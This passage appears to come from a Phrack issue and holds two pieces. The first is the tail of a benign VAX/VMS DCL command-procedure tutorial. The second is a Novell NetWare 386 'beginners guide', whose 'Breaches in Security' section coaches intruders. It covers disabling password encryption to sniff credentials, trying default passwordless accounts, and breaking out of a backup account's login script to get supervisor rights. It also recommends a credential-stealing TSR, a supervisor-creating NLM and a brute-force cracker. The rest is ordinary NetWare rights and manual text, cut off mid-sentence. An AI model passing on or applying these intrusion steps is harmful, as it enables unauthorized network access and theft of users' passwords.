  o  on the right side of an = or == assignment statement
  o  inside brackets on the left side of an assignment statement when
     you're preforming string substitution

If none of these cases fits, apostrophes will force the translation:
   $ DIRECTORY 'PARTS'  (after $ PARTS = "DJA2:[DBA]PARTS.DAT")

Symbols are commonly used for shorthand.  For example, to clear the screen:

   $ ESC[0,8] == 27
   $ CLEAR == "[J"
   $ HOME  == "[H"
   $ CLR == WRITE SYS$OUTPUT ESC,HOME,ESC,CLEAR

Now, anytime you enter CLR, the screen will be cleared.  Symbols can also be
used to execute command procedures:

   $ NETBACK == "@SYS$LOGIN:NETBACKUP"

Finally, foreign commands unknown to DCL can be executed by using symbols:

   $ KERMIT == RUN SYS$$SYSTEM:KERMIT


DCL Expressions
~~~~~~~~~~~~~~
Expressions are built by combining data elements with operators.  A logical
comparison evaluates the relationship between two components as true or
false (True = 1, False = 0).

Lexical functions are VAX/VMS routines that return process or system
information, or manipulate user-supplied data.  Lexical functions are unique
because the result is returned in the function name, allowing it to be used as
a symbol (much like Pascal).  Lexical functions are called with the following
format:

   F$function_name(parameter, parameter...)

For example, the following lexical function manipulates user-supplied data:

   $ STRING = "Go     home    right      now!"
   $ STRING = F$EDIT(STRING, "COMPRESS, UPCASE")
   $ SHOW SYMBOL STRING
      STRING = "GO HOME RIGHT NOW!"


Command Procedures
~~~~~~~~~~~~~~~~~
A command procedure is a file consisting of a sequence of DCL commands which
can be executed interactively or as a batch job (like a .BAT file in MS-DOS or
a REXX EXEC in VM/SP).  Command procedures are used in VAX/VMS to perform
repetitive or complex tasks and to save time.  With a command procedure, you
can execute many DCL commands with a single statement.

Command procedures aren't bound by simple lists of DCL commands executed in
sequence.  They can take advantage of labels, lexical functions, symbols and
relational operators to build sophisticated procedures which act like VAX/VMS
programs.  Command procedures are flexible.  They can be written to take
specific actions based on responses to questions, or even to perform a given
function depending on the time or date.


Writing Command Procedures
~~~~~~~~~~~~~~~~~~~~~~~
A text editor such as EDT or EVE is used to create and edit command procedures,
which should be named "PROCEDURE_NAME.COM".  The file type ".COM" is the
default procedure file type, and if a different file type is included, it must
be included when the procedure is invoked.

Each new command line must begin with a dollar sign ($).  Multiple spaces or
tabs may be included after the "$" for readability, and command lines may be
extended past a single line by ending the previous line with a hyphen (-) and
not starting the next line with a dollar sign.

Data input to programs, such as responses, must be entered without the dollar
sign.  Data lines are used by the program running and are not processed by the
DCL command line interpreter.  For example:

   $ MAIL         <--- invokes the Mail Utility
   SEND           <--- Mail SEND command
   JONES, BOB     <--- response to Mail prompt "To:"
   Memo           <--- response to Mail prompt "Subj:"
   Bob,           <--- Mail message

   How's it going?'?

   Joe
   $              <--- terminates Mail program
   $ EXIT         <--- terminates command procedure


Comments
~~~~~
Comments may be included by preceding them with an exclamation point (!),
which causes everything to the right of it to be ignored by the DCL command
interpreter.  Comments make command procedures easier to debug and modify
later.  Spelling DCL commands out rather than using the abbreviations also
makes the command procedure more readable.


Labels
~~~
Labels are used by the DCL command line interpreter for conditional
processing and repetitive looping.  Labels should be placed on separate
lines, making them easier to find.  Labels can be 255 characters long, may
not contain blanks, and must be terminated with a colon (:).


Debugging
~~~~~~
The SET VERIFY command tells DCL to display each command as it processes it.
This allows you to see where errors are generated, and how strings are
translated.  SET NOVERIFY turns the verify mode off.

The SHOW SYMBOL command displays the contents of defined symbols, and is
used to show the contents of a symbol in a command procedure as it is being
executed.


Invoking Command Procedures
~~~~~~~~~~~~~~~~~~~~~~~~~~
Command procedures may be invoked interactively by typing the "at" sign (@)
followed by the procedure name.  The file type must also be included if it is
not ".COM" (the default).  Command procedures may be invoked at the command
line or from within another command procedure, called nesting.  The DCL SUBMIT
command will place your command (job) in a batch queue with other jobs waiting
to be run.  Command procedures are generally submitted as batch jobs when you
want them to execute at a specific time, they will take a long time to run, or
when a job must run at a reduced priority.  The following command submits the
command procedure ACCOUNT.COM to the VAX/VMS batch processor:

   $ SUBMIT ACCOUNT
   Job ACCOUNT (queue SYS$BATCH, entry 103) started on SYS$BATCH

The SYS$BATCH queue is the default and is used unless otherwise specified with
the /QUEUE qualifier.  When VAX/VMS runs this job, a process with your rights
and privileges will be created and the procedure executed within that process.


Symbols
~~~~~~
Symbols may be local (single equal sign) or global (double equal sign).
Local symbols are recognized by DCL only at the command level at which it
was defined and more deeply nested levels (subsequently called command
procedures).  Global symbols are recognized at any command level.  Local
symbols should be used when the symbols is only needed for the duration of
the command procedure employing it.  You should only define global symbols
if you're going to use them in other command procedures or for the duration
of your login session.

An asterisk can be used to tell the command line interpreter (CLI) to accept
abbreviations.  For example:

   $ NO*TES == "@SYS$LOGIN:NOTES"

This tells the CLI to accept NO, NOT, NOTE, or NOTES as a valid abbreviation
for the NOTES command.  This notation is usevul for long symbol names.


Lexical Functions
~~~~~~~~~~~~~~~~
Lexical functions allow you to obtain basically the same information as DCL
SHOW commands.  However, it's easier to manipulate information which comes
from a lexical function.  As an example, the following two command give the
same information:

   $ SHOW TIME                  ! DCL SHOW TIME command
       12-JUN-1989 14:29:23
   $ WRITE SYS$OUTPUT F$TIME()  ! lexical function
       12-JUN-1989 14:29:25.17

The second command is more usable, however:

   $!  Show_Date.COM
   $!
   $ TIME&DATE = F$TIME()
   $ DATE = F$EXTRACT(0,11,TIME&DATE)
   $ WRITE SYS$OUTPUT DATE

This procedure displays only the date portion of the string returned by the
lexical function F$TIME().  (Use @SHOW_DATE to invoke it) VAX/VMS supports
lexical functions to manipulate text strings, convert data types, and return
information about the system, your process, symbols, files and devices.


Parameters
~~~~~~~~~
Eight reserved symbols (P1 through P8) are available to command procedures to
supply data to process.  By using these parameters in a command procedure,
different data can be specified each time it's run.  Parameter specification is
done on the command line where the procedure is called.  Unless designed to,
the command procedure will not prompt for parameters.  Parameters are separated
with spaces and may be character strings, integers, or symbols.  If you want to
skip a parameter, us a null string (" ").

   $! Add.Com
   $! command procedure to demonstrate passing parameters
   $! (add the first and third parameter)
   $!
   $  WRITE SYS$OUTPUT P1+P3

   $ @ADD 12 " " 14
   26

If a command procedure requires multiple letters or words as a single
parameter, enclose it in quotes and it will be treated as one parameter and
not converted to uppercase.


Terminal Output
~~~~~~~~~~~~
The WRITE and TYPE commands send data to the terminal.  TYPE is used to
display the contents of a file, but may also be used to print lines of text
from within a command procedure.  TYPE may only be used to output text
strings.  Since the WRITE command is processed be DCL, expressions, symbols
and lexical functions are evaluated before the data is sent to the
terminal.

The output expression must translate to a string and be sent to the logical
device SYS$OUTPUT, but may be a string, lexical function, symbol, or any
combination of the three.  Here's an example of a command procedure that
uses terminal output:

   $! Writing a simple text string
   $!
   $  WRITE SYS$OUTPUT "This is a test..."
   $!
   $! Displaying multiple lines at the terminal
   $!
   $  TYPE SYS$OUTPUT Warning!
          It's been 30 days since you changed
          your password.  Change it now!
   $!
   $! Writing a string with a lexical function
   $!
   $  WRITE SYS$OUTPUT " "HI' You are in directory "F$DIRECTORY()' "


Terminal Input
~~~~~~~~~~~
The INQUIRE command's default device is the terminal keyboard, while the
READ command must be told where to accept data from.  The INQUIRE command
prompts for input, reads data and assigns it to a symbol.  All data is
accepted as a character string and is converted to uppercase and compressed
(extra blanks removed).  The READ command prompts for input if the /PROMPT
qualifier is used, accepts data from a specified source and assigns it to a
symbol.  The data is accepted with no string conversion or compression
occurring.  Here's an example of a command procedure that uses terminal
input:

   $! Puts whatever you type in the symbol NAME
   $! the /NOPUNCTUATION qualifier will suppress the colon
   $! and space INQUIRE puts at the end of the prompt
   $!
   $  INQUIRE /NOPUNCTUATION NAME "What is your name? "
   $!
   $! Example of READ using SYS$INPUT (terminal) for data
   $!
   $  READ /PROMPT = "First value: " SYS$INPUT VALUE_1
   $  READ /PROMPT = "Second value: " SYS$INPUT VALUE_2
   $  WRITE SYS$OUTPUT VALUE_1," + ",VALUE_2," = ",VALUE_1+VALUE_2


File I/O
~~~~~~~
The basic steps to read and write files from within command procedures are
similar to most other languages.  Use the OPEN command to open the file.  If it
does not exist, OPEN will create it.  Use the READ or WRITE commands to read or
write text records from the file.  Use the CLOSE command to close the
 file when you're done.

To open a file for writing, you must use the /APPEND or /WRITE qualifier.  The
/WRITE qualifier creates a new file and places the record pointer at the
beginning of the file.  If the file already exists, a new version will be
created by OPEN/WRITE.  The /APPEND qualifier is used to add records to the end
of an existing file.  The file must already exist before using the OPEN/APPEND
command, and when the file is opened, the record pointer is placed at the end
of the file.

To open a file for reading, use the /READ qualifier (the default for the
OPEN command).  A file opened for reading may not be written to, and the
record pointer will initially be placed at the first record in the file.
Each time a record is read, the pointer is moved down to the next record.
The WRITE/UPDATE must be used to write over an existing record. Here's an
example of a command procedure using file input and output:

   $ OPEN/APPEND OUTPUT_FILE NEW.DAT
   $ OPEN/READ INPUT_FILE OLD.DAT
   $ READ INPUT_FILE RECORD
   $ WRITE SYS$OUTPUT "First record from OLD.DAT - ",RECORD
   $ WRITE OUTPUT_FILE "First record from OLD.DAT - ",RECORD

To open a file for both reading and writing, use both the /READ and /WRITE
qualifiers.  The record pointer will be placed at the first record in the file.
Using this method, however, you can only overwrite the record you most recently
read, and records you replace must be the same length.
                                                   

Redirecting Command Procedure I/O
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Command procedures often invoke VAX/VMS utilities, and these programs will
normally get input from the logical device SYS$INPUT.  While executing a
command procedure, SYS$INPUT is directed to the command procedure itself, and
this is why you can put command and data lines for a utility or program
directly in the procedure.  SYS$COMMAND defaults to the terminal from where a
command procedure is being executed, and by redirecting SYS$INPUT to
SYS$COMMAND you can use utilities and other programs interactively from command
procedures:

   $ DEFINE/USER_MODE SYS$INPUT SYS$COMMAND:
   $ EDIT JUNK.DAT

The /USER_MODE qualifier causes the re-assignment to be in effect only for
the next command.

Normally command procedure output is displayed at your terminal.  You may
redirect output to a file by using the /OUTPUT qualifier:

    $ @SHOW_TIME/OUTPUT = TIME.DAT

By default, DCL error and severe error messages are directed to the file
represented by the logical name SYS$ERROR, which usually points to your
terminal.  If you want to log error messages, simply redirect SYS$ERROR to
a file.  If you redirect SYS$ERROR without also redirecting SYS$OUTPUT, DCL
will send error messages to both, and you'll receive the error messages
twice -- at your terminal and in the file.

To completely suppress error messages you can redirect both SYS$ERROR
and SYS$OUTPUT to the null device (NL:) or you can use the SET MESSAGE
command to turn off all message output.  To suppress all messages, use:
SET MESSAGE/NOTEXT/NOIDENTIFICATION/NOFACILITY/NOSEVERITY.


Branching and Conditionals
~~~~~~~~~~~~~~~~~~~~~~~~~
You can use the DCL IF/THEN statements and conditional operators withing
command procedures to cause the execution of a command based on the
evaluation of a condition.  The basic use is:  $ IF condition THEN command.
The condition is a Boolean expression (True or False) and the command is
any legal DCL command.  The following is a list of conditional operators:

Operator        Function
~~~~~~~       
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.EQ. / .EQS.    Determines if two numbers/character strings are equal
.GE. / .GES.    Tests to see whether the first number/character string is
                greater than or equal to the second
.GT. / .GTS.    Determines if the first number/character string is greater
                than the second
.LE. / .LES.    Tests to see if the first number/character string is less
                than or equal to the second
.LT. / .LTS.    Determines if the first number/character string is less than
                the second
.NE. / .NES.    Tests to see whether the two numbers/character strings are
                not equal
.AND.           Combines two numbers with a logical AND   (boolean algebra)
.OR.            Combines two numbers with a logical OR    (boolean algebra)
.NOT.           Logically negates a value

The following is a command procedure using conditional branching:

   $! Time.Com
   $!
   $    TIME = F$TIME()
   $    HOUR = F$EXTRACT(12,2,TIME)
   $    IF HOUR .LT. 12 THEN GOTO MORNING
   $    IF HOUR .LT. 17 THEN GOTO AFTERNOON
   $    IF HOUR .LT. 18 THEN GOTO EVENING
   $    GOTO END
   $  MORNING:
   $    WRITE SYS$OUTPUT "Good morning!"
   $  AFTERNOON:
   $    WRITE SYS$OUTPUT "Good afternoon!"
   $  EVENING:
   $    WRITE SYS$OUTPUT "Good evening!"
   $  END:
   $    EXIT


Loops
~~
Loops are used to repeat a statement or group of statements until a
given condition is met.  DCL supports both DO WHILE and DO UNTIL loops.
The DO WHILE loop tests the condition before evaluation:

   $ LOOP:
   $    IF .NOT. condition THEN GOTO END
     .
     .
     .
   $    GOTO LOOP
   $ END:
   $    EXIT

The DO UNTIL loop executes the statement(s) and then tests the condition:

   $ LOOP:
     .
     .
     .
   $    IF condition THEN GOTO LOOP
   $    EXIT


Subroutines
~~~~~~~~
The DCL command GOSUB transfers execution control to a label and the RETURN
command terminates subroutine execution, returning control to the statement
after the GOSUB command.  Subroutines are useful where you need to do the same
series of commands repeatedly in different parts of a command procedure.  They
also make procedures easier to read and more compact.  The DCL commands GOSUB
and RETURN are not supported in VAX/VMS versions before VAX/VMS Version 4.4.
The following is an example procedure using a subroutine:

   $! Personal.Com
   $!
   $!     opens the personal info file
   $!
   $  OPEN/WRITE OUTPUT_FILE PERINFO.DAT
   $!
   $!     collect info
   $!
   $  INQUIRE RECORD "Enter full name"
   $  GOSUB WRITE_FILE
   $  INQUIRE RECORD "Enter address"
   $  GOSUB WRITE_FILE
   $  INQUIRE RECORD "Enter phone number"
   $  GOSUB WRITE_FILE
   $  CLOSE OUTPUT_FILE
   $  EXIT
   $!
   $!     subroutine WRITE_FILE
   $!
   $  WRITE_FILE:
   $      WRITE OUTPUT_FILE RECORD
   $      RETURN


Error Handling
~~~~~~~~~~~~~
The command interpreter will execute an EXIT command if a severe error occurs,
terminating the procedure and returning control to the previous command level,
unless the DCL ON command is used to specify an action for the command
interpreter to take.  The ON command supports the three keywords WARNING,
ERROR, and SEVERE_ERROR.  To override error handling for procedure warnings,
for example, use something like this:

   $ ON WARNING THEN EXIT
     or
   $ ON WARNING THEN GOTO label

WARNING causes the command procedure to take action if a warning, error, or
severe error occurs.  ERROR causes the action if an error or severe error
occurs, and SEVERE_ERROR causes the action only if a fatal error occurs.

$STATUS and $SEVERITY are reserved DCL global symbols, and each time a command
is executed, values are assigned to these symbols. $STATUS holds the full
condition code of the last statement and $SEVERITY holds an error severity
level.  The condition code in $STATUS is valid to the VAX/VMS MESSAGE facility
and can be used in conjunction with F$MESSAGE to obtain the actual text message
associated with the code:

   $ SET DEFAULT DUB1:[BYNON]
   $ WRITE SYS$OUTPUT $STATUS $X00000001
   $ WRITE SYS$OUTPUT F$MESSAGE(%X00000001)
   % SYSTEM-S-NORMAL, normal successful completion

All DCL commands will return a condition code, but not all condition codes
have text messages.  Condition codes without text messages will return the
message "%NONAME-E-NOMSG Message number (8-digit code)".

The message text isn't very useful for making conditional decisions though, so
$SEVERITY is used.  It contains one of five possible values extracted from the
first three bits of $STATUS.  Here are the codes:

Code  Definition
~~~  ~~~~~~~~~~
 0    Warning
 1    Success
 2    Error
 3    Information
 4    Severe Error

Odd values (1,3) indicate success while even values (0,2,4) indicate failure.
There are basically two ways to use the status and severity codes to handle
errors.  The first is to treat $STATUS as a Boolean value:

   $ SET NOON
   $ command                         ! a DCL command
   $ IF $STATUS THEN GOTO NO_ERR     ! test $STATUS for T or F
     .
     .                               ! handle the error
     .
   $ NO_ERR                          ! continue processing
     .
     .
     .
   $ EXIT

The second method is to trap the error with the ON WARNING command, then use
the severity level to determine an appropriate course of action:

   $ SET NOON
   $ ON WARNING GOTO ERR_TRAP
   $ command                         ! a DCL command
   $ command                         ! a DCL command
     .
     .
     .
   $ EXIT
   $!
   $! error trap code
   $!
   $ ERR_TRAP:
   $    SEVERITY = $SEVERITY             ! save the error code
   $    IF SEVERITY = 0 THEN command     ! if warning...
   $    GOTO DONE
   $    IF SEVERITY = 2 THEN command     ! if error...
   $    GOTO DONE
   $    IF SEVERITY = 4 THEN command     ! if severe error...
   $ DONE:
     .
     .
     .
   $ EXIT

Error checking can be completely disabled with the SET NOON command.  When
this is in effect, the command interpreter continues updating the condition
code, but does not perform any error checking.  The DCL command SET ON
restors error checking to normal.  For example:

   $ SET NOON      ! turn off error checking
   $ command       ! a DCL command
   $ SET ON        ! restor error checking


Termination
~~~~~~~~~~
The EXIT command will terminate the current command procedure and return
control to the command level that called it while the STOP command terminates
all command procedures (if nested) and returns control to DCL.


Example Command Procedures
~~~~~~~~~~~~~~~~~~~~~~~~~
The following are two example command procedures to demonstrate some of
the previously discussed techniques.

Login.Com
~~~~~~~~
   $! Login.Com - executed each time you log in
   $!
   $! Check for a network or batch login
   $!
   $      IF F$MODE() .EQS. "NETWORK" THEN GOTO NETWORK
   $      IF F$MODE() .EQS. "BATCH" THEN GOTO BATCH
   $!
   $! Define process permanent symbols for convenience
   $!
   $      SD == "SET DEFAULT"
   $      SH == "SET HOST"
   $      WI*DE == "SET TERMINAL/WIDTH=132"
   $      NA*RROW == "SET TERMINAL/WIDTH=80"
   $      DIR*ECTORY == "DIRECTORY/SIZE"
   $      PU*RGE == "PURGE/LOG/KEEP=2"            ! keep latest 2 version
   $      HO*ME == "SET DEFAULT SYS$LOGIN:"
   $      WHO == "SHOW USERS"
   $      EVE == "EDIT/TPU"
   $      EDT == "EDIT/EDT/COMMAND=SYS$LOGIN:EDTINI.EDT"
   $      BR*OWSE == "TYPE/PAGE"
   $!
   $! Define special keys
   $!
   $      DEFINE/KEY/NOLOG/TERM PF1 "DIR"         ! term ends with <enter>
   $      DEFINE/KEY/NOLOG PF2 "EDIT"
   $      DEFINE/KEY/NOLOG/TERM/NOECHO PF3 "LOGOUT"
   $      DEFINE/KEY/NOLOG/TERM/NOECHO HELP "SHOW KEY/ALL"
   $!
   $! Modify terminal characteristics
   $!
   $      SET TERMINAL/INSERT     ! insert mode
   $      SET PROMPT = "[BYNON]> "
   $!
   $! Show time and quit
   $!
   $      SHOW TIME
   $      EXIT
   $!
   $! If it's a network login, we can now
   $! perform some other commands if desired.
   $! Just quit for now though.
   $!
   $  NETWORK:
   $      EXIT
   $!
   $! If it's a batch job login, set verification on and quit.
   $!
   $  BATCH:
   $      SET VERIFY
   $      EXIT


Subdir.Com
~~~~~~~~~
   $! Subdir.Com - how to search and parse character strings
   $!
   $      WRITE SYS$OUTPUT F$DIRECTORY()+ " Subdirectories:"
   $      WRITE SYS$OUTPUT " "
   $!
   $! Search for subdirectory names and display them on the terminal
   $!
   $  DIR$LOOP:
   $      FILE = F$SEARCH("*.DIR")
   $!
   $! If DCL returns a null string (" ") we're done
   $!
   $      IF FILE .EQS. " "THEN GOTO END$DIR$LOOP
   $!
   $! Find the position of the period
   $!
   $      DOT = F$LOCATE(".",FILE)
   $!
   $! Find the position of the right bracket
   $!
   $      BRACKET = F$LOCATE("]",FILE)
   $!
   $! Extract the string between the dot and bracket
   $!
   $      FILE = F$EXTRACT(BRACKET+1,DOT-BRACKET-1,FILE)
   $!
   $! Display the subdirectory name and start over
   $!
   $      WRITE SYS$OUTPUT "      ' 'FILE' "
   $      GOTO DIR$LOOP
   $  END$DIR$LOOP:
   $      EXIT                                              

<END PART I>
______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                Volume Three, Issue Thirty-five, File 8 of 13

 
+=========================================================================+
                                                                           
 
                   A Beginners Guide to Novell Netware 386                 
 
                                                                           
 
                             Brought to you by:                            
 
                                                                           
 
                                 The Butler                                
 
 
+=========================================================================+

As most of you know NOVELL is the most popular PC network software around,with
that being the case I decided to put together a little file on just what you
can do with a NOVELL network.

* The information in this file is primarily for NOVELL NETWARE 386 networks!!!
If you have NOVELL NETWARE 286 some of this information may not be correct.

When the word "Network" is mentioned in this file I am referring to a PC-based
network or LAN (Local Area Network).

If you are not familiar with the concept of a "Network" I would suggest you
first get acquainted with it by either picking up a good book or if you have
access to one, go exploring.

This file is for those who have some experience with networks and or the
concept of a network.

(----------------------------------------------------------------------------)

Variations in Setups:

Every network is setup differently is some way.  Even within the same company
two different networks may be setup different.  The differences may be slight
or major and can consist of everything from menus to naming conventions.

Companies that install networks as a business are inconsistent with their
setups also because every network technician does things differently and every
customer wants things to be a certain way.

Keep this idea in mind when exploring different networks because most likely
the setup will be different from network to network.

(----------------------------------------------------------------------------)

Terminology:

 Bindery-- A database that contains definitions of entities such as users
           groups, and workgroups.  The bindery is comprised of three
           components: objects, properties, and property data sets.

 Console-- The monitor and keyboard at which you actually control fileserver
           activity.

 File Server-- The Computer that the Network software, applications, and some
               data reside on.  (Usually a very powerful one, i.e. Compaq 486
               with 1 gigabyte of storage).

 Groups-- A means of dealing with users collectively rather than individually.
          i.e. Word Processing, Accounting.

 LAN-- Local Area Network

 Login Script-- Similar to autoexec.bat, contains commands that initialize
                environmental variables, map network drives, and control the
                user's program execution.

 Netware-- Novell's Network Operating System.

 Netwire-- Novell's on-line information service, accessible via Compuserve.

 Network-- A group of computers that can communicate with each other.

 NIC-- Network Interface Card

 Novell-- Software Manufacturer

 Objects-- any physical or logical entities, including users, user groups,
           workgroups, file servers, print servers, or any other entity that
           has been given a name.

 Print Server-- A computer dedicated to controlling all jobs for a specified
                printer.

 Properties-- the characteristics of each bindery object.  Passwords, account
              restrictions, account balances, internetwork addresses, list of
              authorized clients, and group members are all properties.

 Property Data Sets-- the values assigned to an entity's bindery properties.

 Rights-- Rights control which directories and files a user or group can
          access and what the user or group is allowed to do with those
          directories and files.

 User-- Any person allowed to work on the network.

 WAN-- Wide Area Network

 Workstation-- Any usable computer connected to a network.

(----------------------------------------------------------------------------)

Netware Environment:

The SYS:SYSTEM directory is used for system administration and contains
operating system files, NetWare utilities, and programs reserved for
SUPERVISOR.

The SYS:PUBLIC directory is used for general access and contains NetWare
utilities and programs for regular network users.

The SYS:LOGIN directory contains the programs necessary for logging in.

The SYS:MAIL directory is used by NetWare-compatible mail programs.  This
directory also has and ID number subdirectory for each user that contains
the user login script and print job configurations.

(----------------------------------------------------------------------------)

Breaches in Security:

Set Allow Unencrypted Passwords=on/off.

Enter this command from the "CONSOLE".

By changing this command you will disable the encryption scheme which will
then allow you to sniff passwords from the cables between workstations and
servers.

By default Netware comes with usernames GUEST and SUPERVISOR that have no
passwords.

Also try names like TAPE, BACKUP, SERVER, REMOTE, CONNECT, NOVELL, etc...  If
you have access to an existing account use SYSCON to get a list of all the user
names, most likely there will be one or two accounts that don't have passwords.

Also on some of these accounts that do not have passwords, part of their logon
process is the execution of a batch file that executes the individual software
i.e. backup.  A batch file is a batch file so if its not disabled do the old
CTRL-C to break out of the batch file and roam around.  Some accounts like the
backup account must have supervisor rights so that everything can be backed up.
So if you can break out of one of these you can roam the whole Network.

There are also a few neat little programs out there in cyberspace that will
make your task of getting access a little easier:

        1.  THIEFNOV.ZIP ===> THIEFNOV is a TSR that will capture usernames
                              and passwords from a workstation on Novell
                              Networks. The Thief works by hiding in a user's
                              autoexec.bat file, and executing every time
                              someone tries to login to the network.  The Thief
                              captures their username and password and saves
                              them in a hidden file in the root directory of
                              their C: drive.

        2.  TEMPSUP.ZIP ====> TEMPSUP is a utility that will create a user for
                              you to play with.  TEMPSUP comes with two
                              programs, an executable and a NLM module. The
                              executable can be run by any user with access to
                              DOS but only gives you the rights of that user.
                              But, the NLM module can be loaded at the Console
                              and will give you Supervisor Rights to the whole
                              Network. The syntax is "Tempsup_username to be
                              created" i.e. f:> tempsup hacker <return>.

        3.  NETCRACK.ZIP ===> NETCRACK is a brute force hacking program
                              designed for Novell.  NETCRACK can be run with
                              out login in to the network but by just loading
                              ipx and netx.  NETCRACK starts with AAA and goes
                              from there trying to guess the password for any
                              user.  The syntax is "netcrack_username <return>.


These are the only programs I know of made especially for Novell and I have
personally tried them all out with excellent results.

If you do get access to a Novell Network and you are not sure what to do, then
go to the F:PUBLIC directory and type HELP.  Novell comes with an online help
system that uses FOLIO Infobases.  The HELP system is very easy to navigate
through and is better that the actual Novell Manuals.  You can even download
the programs NFOLIO.COM & NFOLIO.EXE and the infobases *.NFO to your local PC
to examine further.

If you are using the brute force hacking method Novell will stop you dead in
your tracks if the Intruder Detection/Lockout option has been enabled because
after 3 unsuccessful login attempts the account is locked until a supervisor
resets it.

Intruder Detection/Lockout options are as follows:

        Detect Intruders:                       Yes/No
        Intruder Detection Threshold
        Incorrect Login Attempts:               #
        Bad Login Count Retention Time:         # Days    # Hours   # Minutes

        Lock Account After Detection:           Yes/No
                Length of Account Lockout:      # Days    # Hours   # Minutes


The following restrictions are optional for every user account:

        Account Disabled:                       Yes/No
        Account Has Expiration Date:            Yes/No
                Date Account Expires:
        Limit Concurrent Connections:           Yes/No
                Maximum Connections:
        Allow User To Change Password           Yes/No
        Require Password:                       Yes/No
                Minimum Password Length:
        Force Periodic Password Changes:        Yes/No
                Days Between Forced Changes:
                Date Password Expires:
                Limit Grace Logins:             Yes/No
                        Grace Logins Allowed:
                        Remaining Grace Logins:
        Require Unique Passwords:               Yes/No


Novell can also be setup so that users can only logon during certain hours,
i.e. 8 a.m. - 5 p.m. Monday thru Friday.

Trustee Assignments grant rights to specific users (or groups) that allow
them to use a file or directory in particular ways (i.e., only for reading)
The network supervisor can select the appropriate rights to assign to users
or groups in each directory or file.

A trustee assignment automatically grants users the right to see to the root of
a directory.  However, the users can't see any of the subdirectories unless
they also have been granted rights in the subdirectories.

Inherited Rights Masks are given to each file and directory when they are
created.  The default Inherited Rights Mask includes all rights. But this does
not mean that users have all rights; users can only use rights that they been
granted in trustee assignments.

If the Inherited Rights Mask is modified for a file or subdirectory below the
original trustee assignment, the only rights the user can "inherit" for the
file or subdirectory are rights that are allowed by the Inherited Rights Mask.
For example, if a user is granted Read right with a directory trustee
assignment, the right to read files in a subdirectory could be revoked by
having the Read right removed from the subdirectory's Inherited Rights Mask.

Both trustee assignments and Inherited Rights Masks use the same eight trustee
rights to control access to directories and file.

S -- Supervisory

        Supervisory right grants all rights to the directory or file.  At the
        directory level, this right grants all rights to the directory and to
        any files, subdirectories, or subdirectory files in that directory.
        The Supervisory right overrides any restrictions placed on subdirs or
        files with Inherited Rights Masks.  Users who have the Supervisory
        right in a directory can grant other users Supervisory rights to the
        directory, its files, and subdirectories.

        Once the Supervisory right has been granted, it can be revoked only
        from the directory is was granted to.  It cannot be revoked in a
        file or subdirectory.

R -- Read

        Read right allows users to open and read files.  At the directory
        level this right allows users to open files in a directory and read
        the contents or run the program.  At the file level, this right allows
        users to open and read the file (even when the right has been revoked
        at the directory level).

W -- Write

        Write right allows users to write to files.  At the directory level,
        this right allows users to open and write to (modify the contents of)
        file in the directory.  At the file level, this right allows users
        to open and write to the file (even if the right has been revoked at
        the directory level).

C -- Create

        Create right allows users to create directories and files.  At the
        directory level, this right allows users to create files and
        subdirectories in the directory.  At the file level, this right
        allows users to salvage a file after it has been deleted.

E -- Erase

        Erase right allows users to delete directories and files.  At the
        directory level, this right allows users to delete a directory as well
        as any files, subdirectories, and subdirectory files in that
        directory.  At the file level, this right allows users to delete the
        file (even when the right has been revoked at the directory level).

M -- Modify

        Modify right allows users to change directory and file attribute sand
        to rename subdirectories and files. At the directory level, this right
        allows users to change the attributes of and rename any file, subdir,
        or subdirectory file in that directory. At the file level, this right
        allows users to change the file's attributes or to rename the file
        (even when the right has been revoked at the directory level).

F -- File Scan

        File Scan right allows users to see files.  At the directory level,
        this right allows users to see files and subdirectories in a
        directory.  At the file level, this right allows users to see the file
        (even when the right has been revoked at the directory level).

A -- Access Control

        Access Control right allows users to modify trustee assignments and
        Inherited Rights Masks.

(----------------------------------------------------------------------------)

As a network user, you should be familiar with the operation of the personal
computer you are using.  If you have an IBM PC-type workstation, you should
also be familiar with basic Disk Operating System (DOS) commands.

User Basics is divided into the following ten sections.  The first section
explains basic networking concepts and gives an overview of how a NetWare
network operates.

The second section introduces the NetWare menu and command line utilities and
explains how to use them.

The next seven sections explain some basic network tasks:

o   Booting up
o   Logging in and out
o   Creating your login script
o   Mapping your drives
o   Sending messages
o   Managing files and directories
o   Printing

Some basic troubleshooting hints are covered under "What If ..." at the end of
each of these modules and are also listed in the index.

The last section lists some common error messages and how to respond to them.

This booklet does not explain how to perform every network task or how to use
every available network command.  For complete explanations of all network
tasks and commands, see NetWare v3.11 Utilities Reference.

INTRODUCTION TO NETWARE

If your personal computer is part of a NetWare network, it is connected to
other computers and peripherals.  You can share files and resources and
communicate with others in your workgroup, thus increasing productivity.

This introduction answers the following questions about using a NetWare
network:

o   What is a NetWare network?
o   How does a network operate?
o   How are files stored on a network?
o   Who can use the network?
o   How is information protected on a network?

WHAT IS A NETWARE NETWORK?

A NetWare network is a group of computers (such as IBM PCs or Macintoshes)
that are linked together so they can communicate and share resources.

Network users, each working on a different personal computer, can communicate
with each other via the network.  They can also share network resources (hard
disks on the file server, data, applications, and printers) and use any service
the network provides (for example, access to a mainframe system).

HOW DOES A NETWORK OPERATE?

To understand how a network operates, you must know about the principal
components of a network: the file server, the workstations, and the software
that runs on each----NetWare and operating systems like DOS, OS/2, VMS, UNIX,
and the Macintosh operating system.

Beyond these basic components, a NetWare network can incorporate mainframe
computers, backup devices, modem pools, and different types of servers (such as
file servers, print servers, or archive servers).

The Network Workstations and DOS

Workstations are the personal computers on which network users do their work.
Workstations are used much like non-networked personal computers.  The only
difference is that they can access files from more than just the local drives.
Each workstation processes its own files and uses its own copy of DOS.

The Network File Server and NetWare

The file server is a personal computer that uses the NetWare operating system
to control the network.  The file server coordinates all of the workstations
and regulates the way they share network resources.  It regulates who can
access which files, who can make changes to data, and who can use the printer
first.

All network files are stored on a hard disk in or attached to the file server,
instead of on diskettes or hard disks in individual workstations.

The NetWare Workstation

Workstations use two pieces of software to communicate with the file server,
the shell and a protocol.  The shell must be loaded into each workstation
before that workstation can function on the network.

The NetWare shell, either NET3 or NET4 (depending on whether you are using DOS
3.x or 4.x), directs workstation requests to DOS or NetWare.  When a
workstation makes a request (asks to do a task), the shell decides if it is a
workstation task (to be directed to DOS) or a network task (to be directed to
NetWare).  If the request is a workstation task (such as using the DOS DIR
command to list the files in a local directory), DOS should handle the request.
If the request is a network task (such as printing a job on a network printer),
